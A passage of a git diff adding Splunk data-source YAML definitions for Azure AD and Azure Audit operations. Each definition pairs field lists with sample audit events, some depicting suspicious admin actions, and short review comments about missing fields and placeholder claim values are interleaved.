+ version: 5.2.2
+fields:
+- _time
+- Level
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2024-01-29T21:31:03.0102031Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam",
+ "operationName": "Update application", "operationVersion": "1.0", "category": "AuditLogs",
+ "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "resultSignature": "None", "durationMs":
+ 0, "correlationId": "a5396d2b-fcf6-41e7-9219-c6239f1298e3", "Level": 4, "properties":
+ {"id": "Directory_a5396d2b-fcf6-41e7-9219-c6239f1298e3_DGBDP_1548236", "category":
+ "ApplicationManagement", "correlationId": "a5396d2b-fcf6-41e7-9219-c6239f1298e3",
+ "result": "success", "resultReason": "", "activityDisplayName": "Update application",
+ "activityDateTime": "2024-01-29T21:31:03.0102031+00:00", "loggedByService": "Core
+ Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user":
+ {"id": "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName":
+ "user30@splunkresearch.onmicrosoft.com", "ipAddress": "", "roles": []}}, "targetResources":
+ [{"id": "75924835-d844-4947-96ba-18074e997386", "displayName": "MaliciousApp", "type":
+ "Application", "modifiedProperties": [{"displayName": "RequiredResourceAccess",
+ "oldValue": "[{\"ResourceAppId\":\"00000003-0000-0000-c000-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"570282fd-fa5c-430d-a7fd-fc8dc98a9dca\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"7427e0e9-2fba-42fe-b0c0-848c9e6a8182\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1}]",
+ "newValue": "[{\"ResourceAppId\":\"00000003-0000-0000-c000-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"570282fd-fa5c-430d-a7fd-fc8dc98a9dca\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"7427e0e9-2fba-42fe-b0c0-848c9e6a8182\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1},{\"ResourceAppId\":\"00000002-0000-0ff1-ce00-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"dc890d15-9560-4a4c-9b7f-a736ec74ec40\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1}]"},
+ {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"RequiredResourceAccess\""}],
+ "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value":
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
+ Gecko) Chrome/120.0.0.0 Safari/537.36"}, {"key": "AppId", "value": "867f0d29-0eab-4017-b691-c4713cc7d7b0"}]}}'
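Review bot: `callerIpAddress` is missing from this data source's field list, unlike every other Azure AD audit source in the commit, and the example event also lacks it while `initiatedBy.user.ipAddress` is `""`. If the list was generated from this one event, the omission may be an artifact of the sample rather than a property of the `Update application` operation; it is worth confirming against additional events before detections assume the field is absent. A one-line comment above `fields:` recording the derivation would help, e.g. `# fields derived from the example_log event; callerIpAddress was not present in the sample`.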
diff --git a/data_sources/azure_active_directory_update_authorization_policy.yml b/data_sources/azure_active_directory_update_authorization_policy.yml
new file mode 100644
index 0000000000..564ac6d8fa
--- /dev/null
+++ b/data_sources/azure_active_directory_update_authorization_policy.yml
@@ -0,0 +1,84 @@
+name: Azure Active Directory Update authorization policy
+id: c5b7ffcd-73d8-4fe5-afd8-b1218d715c0c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Update authorization policy
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-10-26T19:22:20.2814027Z", "resourceId": "/tenants/5f210575-a69b-41a7-b623-3f6d79ccd432/providers/Microsoft.aadiam",
+ "operationName": "Update authorization policy", "operationVersion": "1.0", "category":
+ "AuditLogs", "tenantId": "5f210575-a69b-41a7-b623-3f6d79ccd432", "resultSignature":
+ "None", "durationMs": 0, "callerIpAddress": "1.2.3.4", "correlationId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065",
+ "Level": 4, "properties": {"id": "Directory_cc46d719-4c0f-4b78-8795-b0d6ca5b2065_6CH7M_196574953",
+ "category": "AuthorizationPolicy", "correlationId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065",
+ "result": "success", "resultReason": "", "activityDisplayName": "Update authorization
+ policy", "activityDateTime": "2023-10-26T19:22:20.2814027+00:00", "loggedByService":
+ "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user":
+ {"id": "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName":
+ "attacker@splunkresearch.onmicrosoft.com", "ipAddress": "1.2.3.4", "roles": []}},
+ "targetResources": [{"id": "24484114-1daa-4700-aaf7-44ee5cbe5678", "displayName":
+ "Authorization Policy", "type": "Other", "modifiedProperties": [{"displayName":
+ "AllowUserConsentForRiskyApps", "oldValue": "[false]", "newValue": "[true]"}, {"displayName":
+ "PermissionGrantPolicyIdsAssignedToDefaultUserRole", "oldValue": "[\"ManagePermissionGrantsForSelf.microsoft-user-default-legacy\"]",
+ "newValue": "[\"microsoft-user-default-legacy\"]"}, {"displayName": "Included Updated
+ Properties", "oldValue": null, "newValue": "\"AllowUserConsentForRiskyApps, PermissionGrantPolicyIdsAssignedToDefaultUserRole\""}],
+ "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value":
+ "Swagger-Codegen/1.0.0.0/csharp/msal"}]}}'
diff --git a/data_sources/azure_active_directory_update_user.yml b/data_sources/azure_active_directory_update_user.yml
new file mode 100644
index 0000000000..5d26614a9b
--- /dev/null
+++ b/data_sources/azure_active_directory_update_user.yml
@@ -0,0 +1,83 @@
+name: Azure Active Directory Update user
+id: 5495c90a-047c-4b8e-b2fe-1db6282d3872
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Update user
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-24T14:28:15.2233481Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+ "operationName": "Update user", "operationVersion": "1.0", "category": "AuditLogs",
+ "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs":
+ 0, "callerIpAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "correlationId":
+ "d34f6d2e-3120-4b96-b922-e06090f6a497", "Level": 4, "properties": {"id": "Directory_d34f6d2e-3120-4b96-b922-e06090f6a497_VPRLA_316413199",
+ "category": "UserManagement", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497",
+ "result": "success", "resultReason": "", "activityDisplayName": "Update user", "activityDateTime":
+ "2023-07-24T14:28:15.2233481+00:00", "loggedByService": "Core Directory", "operationType":
+ "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce",
+ "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress":
+ "2601:646:a000:200:b0ee:600c:de8a:c7d5", "roles": []}}, "targetResources": [{"id":
+ "83a3158c-1d08-4686-b5f9-72fb34cb606e", "displayName": null, "type": "User", "userPrincipalName":
+ "testuser@splunkresearch.com", "modifiedProperties": [{"displayName": "AccountEnabled",
+ "oldValue": "[false]", "newValue": "[true]"}, {"displayName": "Included Updated
+ Properties", "oldValue": null, "newValue": "\"AccountEnabled\""}, {"displayName":
+ "TargetId.UserType", "oldValue": null, "newValue": "\"Member\""}], "administrativeUnits":
+ []}], "additionalDetails": [{"key": "UserType", "value": "Member"}]}}'
diff --git a/data_sources/azure_active_directory_user_registered_security_info.yml b/data_sources/azure_active_directory_user_registered_security_info.yml
new file mode 100644
index 0000000000..9d5329b76d
--- /dev/null
+++ b/data_sources/azure_active_directory_user_registered_security_info.yml
@@ -0,0 +1,78 @@
+name: Azure Active Directory User registered security info
+id: b63240de-8a01-4ba8-8987-89d18d4b375d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory User registered security
+ info
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultDescription
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-01-30T21:11:30.8690619Z", "resourceId": "/tenants/91da745f-8abb-4a7d-ba94-5667c6f9e01a/providers/Microsoft.aadiam",
+ "operationName": "User registered security info", "operationVersion": "1.0", "category":
+ "AuditLogs", "tenantId": "91da745f-8abb-4a7d-ba94-5667c6f9e01a", "resultSignature":
+ "None", "resultDescription": "User registered App Password", "durationMs": 0, "callerIpAddress":
+ "72.1.2.43", "correlationId": "14279c94-7ebc-409f-be4e-7861f13c8a79", "Level": 4,
+ "properties": {"id": "IAMUX_14279c94-7ebc-409f-be4e-7861f13c8a79_K2ATV_323947358",
+ "category": "UserManagement", "correlationId": "14279c94-7ebc-409f-be4e-7861f13c8a79",
+ "result": "success", "resultReason": "User registered App Password", "activityDisplayName":
+ "User registered security info", "activityDateTime": "2023-01-30T21:11:30.8690619+00:00",
+ "loggedByService": "Authentication Methods", "operationType": "Add", "userAgent":
+ null, "initiatedBy": {"user": {"id": "40b61050-e814-4ae5-8ffe-66b6f0c53998", "displayName":
+ null, "userPrincipalName": "User30@splunkresearch.com", "ipAddress": "72.1.2.43",
+ "roles": []}}, "targetResources": [{"id": "40b61050-e814-4ae5-8ffe-66b6f0c53998",
+ "displayName": "User30", "type": "User", "userPrincipalName": "User30@splunkresearch.com",
+ "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": []}}'
diff --git a/data_sources/azure_audit_create_or_update_an_azure_automation_account.yml b/data_sources/azure_audit_create_or_update_an_azure_automation_account.yml
new file mode 100644
index 0000000000..4d8f8966a3
--- /dev/null
+++ b/data_sources/azure_audit_create_or_update_an_azure_automation_account.yml
@@ -0,0 +1,135 @@
+name: Azure Audit Create or Update an Azure Automation account
+id: 2ab182e7-feda-4249-9418-32710b55a885
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Audit Create or Update an Azure Automation
+ account
+source: mscs:azure:audit
+sourcetype: mscs:azure:audit
+separator: operationName.localizedValue
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- authorization.action
+- authorization.scope
+- caller
+- channels
+- claims.aio
+- claims.altsecid
+- claims.appid
+- claims.appidacr
+- claims.aud
+- claims.exp
+- claims.groups
+- claims.http://schemas.microsoft.com/claims/authnclassreference
+- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
+- claims.http://schemas.microsoft.com/identity/claims/identityprovider
+- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
+- claims.http://schemas.microsoft.com/identity/claims/scope
+- claims.http://schemas.microsoft.com/identity/claims/tenantid
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
+- claims.iat
+- claims.ipaddr
+- claims.iss
+- claims.name
+- claims.nbf
+- claims.puid
+- claims.rh
+- claims.uti
+- claims.ver
+- claims.wids
+- claims.xms_tcdt
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- eventDataId
+- eventName.localizedValue
+- eventName.value
+- eventSource.localizedValue
+- eventSource.value
+- eventTimestamp
+- host
+- id
+- index
+- level
+- linecount
+- object
+- object_id
+- object_path
+- operationId
+- operationName.localizedValue
+- operationName.value
+- product
+- properties.entity
+- properties.eventCategory
+- properties.hierarchy
+- properties.message
+- punct
+- resourceGroupName
+- resourceProviderName.localizedValue
+- resourceProviderName.value
+- resourceUri
+- source
+- sourcetype
+- splunk_server
+- status
+- status.localizedValue
+- status.value
+- subStatus.value
+- submissionTimestamp
+- subscriptionId
+- timeendpos
+- timestartpos
+- user
+- user_name
+- vendor
+- vendor_product
+- vendor_res_code
+example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/write",
+ "scope": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount"},
+ "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/",
+ "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661179930",
+ "nbf": "1661179930", "exp": "1661185179", "http://schemas.microsoft.com/claims/authnclassreference":
+ "1", "aio": "AWQAm/8TAAAATFEszAxfULi02mHZwJPr322a2w4m7xjhs9xgc61bVQITM6lcvJI17c8SKQGIWgIA0FysfS1bmLHdxImNfT26qJ5Sfc5UdTncHkz3UYu+AvgCW1gg1mRxOZEFXYdIlQ/h",
+ "altsecid": "1:live.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences":
+ "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress":
+ "evilAdmin@contoso.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname":
+ "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John",
+ "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider":
+ "live.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier":
+ "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.",
+ "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":
+ "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid":
+ "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name":
+ "contoso.com#evilAdmin@contoso.com", "uti": "OyNAqM760kmqzxVr6jwtAA", "ver": "1.0",
+ "wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId":
+ "59e3de3b-b8c6-4360-9bc5-f094ebce6422", "description": "", "eventDataId": "b0a0bf02-57e5-4eb3-a36d-f2681d874637",
+ "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource":
+ {"value": "Administrative", "localizedValue": "Administrative"}, "id": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount/events/b0a0bf02-57e5-4eb3-a36d-f2681d874637/ticks/637967777618694806",
+ "level": "Informational", "resourceGroupName": "ResourceGroup1", "resourceProviderName":
+ {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri":
+ "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount",
+ "operationId": "6a420172-1ccd-4144-ac12-3095b4019ed5", "operationName": {"value":
+ "Microsoft.Automation/automationAccounts/write", "localizedValue": "Create or Update
+ an Azure Automation account"}, "properties": {"eventCategory": "Administrative",
+ "entity": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount",
+ "message": "Microsoft.Automation/automationAccounts/write", "hierarchy": "67165197-75ea-4ca3-96a5-3e23868eacd0"},
+ "status": {"value": "Succeeded", "localizedValue": "Succeeded"}, "subStatus": {"value":
+ "", "localizedValue": ""}, "eventTimestamp": "2022-08-22T15:09:21.8694806Z", "submissionTimestamp":
+ "2022-08-22T15:10:51.152208Z", "subscriptionId": "67165197-75ea-4ca3-96a5-3e23868eacd0"}'
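Review bot: The `example_log` string carries opaque Entra ID token claims (`aio`, `rh`, `uti`, `puid`, `altsecid`) and a tenant id next to clearly synthetic identities such as `evilAdmin@contoso.com`; if these were captured from a live tenant rather than constructed, they should be replaced with obviously synthetic values, e.g. `"puid": "<PLACEHOLDER_PUID>"`, before the data source is published. The same claim values recur in the runbook and webhook data sources added below (`azure_audit_create_or_update_an_azure_automation_runbook.yml` and `..._webhook.yml`), so one scrub covers all three. Separately, `version: 5.2.2` under `supported_TA` is a string only because it has two dots; a two-component add-on version such as 5.3 would parse as a float, so quoting it as `version: '5.2.2'` keeps the field's type stable, as `date` already is.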
diff --git a/data_sources/azure_audit_create_or_update_an_azure_automation_runbook.yml b/data_sources/azure_audit_create_or_update_an_azure_automation_runbook.yml
new file mode 100644
index 0000000000..f9054728e3
--- /dev/null
+++ b/data_sources/azure_audit_create_or_update_an_azure_automation_runbook.yml
@@ -0,0 +1,136 @@
+name: Azure Audit Create or Update an Azure Automation Runbook
+id: 2bd83221-7a8b-436f-9b2b-efa1d44d009e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Audit Create or Update an Azure Automation
+ Runbook
+source: mscs:azure:audit
+sourcetype: mscs:azure:audit
+separator: operationName.localizedValue
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- authorization.action
+- authorization.scope
+- caller
+- channels
+- claims.aio
+- claims.altsecid
+- claims.appid
+- claims.appidacr
+- claims.aud
+- claims.exp
+- claims.groups
+- claims.http://schemas.microsoft.com/claims/authnclassreference
+- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
+- claims.http://schemas.microsoft.com/identity/claims/identityprovider
+- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
+- claims.http://schemas.microsoft.com/identity/claims/scope
+- claims.http://schemas.microsoft.com/identity/claims/tenantid
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
+- claims.iat
+- claims.ipaddr
+- claims.iss
+- claims.name
+- claims.nbf
+- claims.puid
+- claims.rh
+- claims.uti
+- claims.ver
+- claims.wids
+- claims.xms_tcdt
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- eventDataId
+- eventName.localizedValue
+- eventName.value
+- eventSource.localizedValue
+- eventSource.value
+- eventTimestamp
+- host
+- id
+- index
+- level
+- linecount
+- object
+- object_id
+- object_path
+- operationId
+- operationName.localizedValue
+- operationName.value
+- product
+- properties.entity
+- properties.eventCategory
+- properties.hierarchy
+- properties.message
+- punct
+- resourceGroupName
+- resourceProviderName.localizedValue
+- resourceProviderName.value
+- resourceUri
+- source
+- sourcetype
+- splunk_server
+- status
+- status.localizedValue
+- status.value
+- subStatus.value
+- submissionTimestamp
+- subscriptionId
+- timeendpos
+- timestartpos
+- user
+- user_name
+- vendor
+- vendor_product
+- vendor_res_code
+example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/runbooks/write",
+ "scope": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourceGroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook"},
+ "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/",
+ "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661194261",
+ "nbf": "1661194261", "exp": "1661198249", "http://schemas.microsoft.com/claims/authnclassreference":
+ "1", "aio": "AWQAm/8TAAAA3iMcbqqPPdXPATT7oalIKsh6wEFsyQ+zUVCshaLu77xsLlt067TtI11gy5hAx+z905hrX1VBehDGaedvEg2UF0BSbHVL9bJrry4zk3Xt+HNt5dTXDDgABOFuNB4QJBUW",
+ "altsecid": "1:live.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences":
+ "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress":
+ "evilAdmin@contoso.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname":
+ "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John",
+ "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider":
+ "live.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier":
+ "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.",
+ "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":
+ "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid":
+ "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name":
+ "contoso.com#evilAdmin@contoso.com", "uti": "YMAP5fOmMkuuBUgBe-Z5AA", "ver": "1.0",
+ "wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId":
+ "49b945c0-966a-48d8-b79b-31f184544594", "description": "", "eventDataId": "303f17eb-10cb-458f-8a80-683f40f123a2",
+ "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource":
+ {"value": "Administrative", "localizedValue": "Administrative"}, "id": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook/events/303f17eb-10cb-458f-8a80-683f40f123a2/ticks/637967920541346086",
+ "level": "Informational", "resourceGroupName": "resourceGroup1", "resourceProviderName":
+ {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri":
+ "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook",
+ "operationId": "b6e30ace-986c-4735-980f-926db0b43336", "operationName": {"value":
+ "Microsoft.Automation/automationAccounts/runbooks/write", "localizedValue": "Create
+ or Update an Azure Automation Runbook"}, "properties": {"eventCategory": "Administrative",
+ "entity": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook",
+ "message": "Microsoft.Automation/automationAccounts/runbooks/write", "hierarchy":
+ "1aee0e3d-b75b-440a-a927-76f0552a14e6"}, "status": {"value": "Succeeded", "localizedValue":
+ "Succeeded"}, "subStatus": {"value": "", "localizedValue": ""}, "eventTimestamp":
+ "2022-08-22T19:07:34.1346086Z", "submissionTimestamp": "2022-08-22T19:08:54.1547383Z",
+ "subscriptionId": "1aee0e3d-b75b-440a-a927-76f0552a14e6"}'
diff --git a/data_sources/azure_audit_create_or_update_an_azure_automation_webhook.yml b/data_sources/azure_audit_create_or_update_an_azure_automation_webhook.yml
new file mode 100644
index 0000000000..80bbd24828
--- /dev/null
+++ b/data_sources/azure_audit_create_or_update_an_azure_automation_webhook.yml
@@ -0,0 +1,147 @@
+name: Azure Audit Create or Update an Azure Automation webhook
+id: 575faeb2-09d0-4849-b1f6-eae241f26ff2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Audit Create or Update an Azure Automation
+ webhook
+source: mscs:azure:audit
+sourcetype: mscs:azure:audit
+separator: operationName.localizedValue
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
